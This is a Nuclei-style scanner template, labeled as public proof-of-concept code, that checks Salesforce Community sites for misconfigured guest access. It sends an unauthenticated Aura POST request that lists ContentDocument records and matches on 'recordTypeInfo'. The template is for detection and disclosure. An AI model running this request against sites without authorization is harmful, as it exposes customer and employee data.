A misconfigured Salesforce Community may lead to sensitive Salesforce data being exposed to anyone on the internet. Anonymous users can query objects that contain sensitive information such as customer lists, support cases, and employee email addresses.
PoC代码[已公开]
id: salesforce-community-misconfig
info:
name: Salesforce Community Misconfiguration
author: domwhewell-sage
severity: medium
description: |
A misconfigured Salesforce Community may lead to sensitive Salesforce data being exposed to anyone on the internet. Anonymous users can query objects that contain sensitive information such as customer lists, support cases, and employee email addresses.
reference:
- https://www.varonis.com/blog/abusing-salesforce-communities
- https://www.enumerated.ie/index/salesforce
metadata:
verified: true
publicwww-query: sfsites
tags: aura,unauth,salesforce,exposure,misconfig,vuln
variables:
actions: '{"actions":[{"id":"{{randstr}}","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"ContentDocument","layoutType":"FULL","pageSize":20,"currentPage":0,"useTimeout":false,"getCount":true,"enableRowActions":false}}]}'
http:
- method: GET
path:
- "{{RootURL}}/s/"
redirects: true
max-redirects: 1
matchers:
- type: status
status:
- 200
internal: true
extractors:
- type: regex
name: aura_context
part: body
group: 1
regex:
- '\/s\/sfsites\/l\/([a-zA-Z0-9\-_~.%]+)\/[^\/]+\.js'
internal: true
- method: POST
path:
- "{{RootURL}}/s/sfsites/aura"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
message={{url_encode(actions)}}&aura.context={{aura_context}}&aura.token=null
matchers:
- type: word
part: body
words:
- "recordTypeInfo"
# digest: 4a0a00473045022100a572fe733c24f31b3bdd8cc8591f29a111ac6239d3b8cca5119f8859f3390f80022002cd90211a9a2fac66be5e4c8272a4e966e37de1ceadff0d56b6d0ae9d7e124c:922c64590222798bb761d5b6d8e72950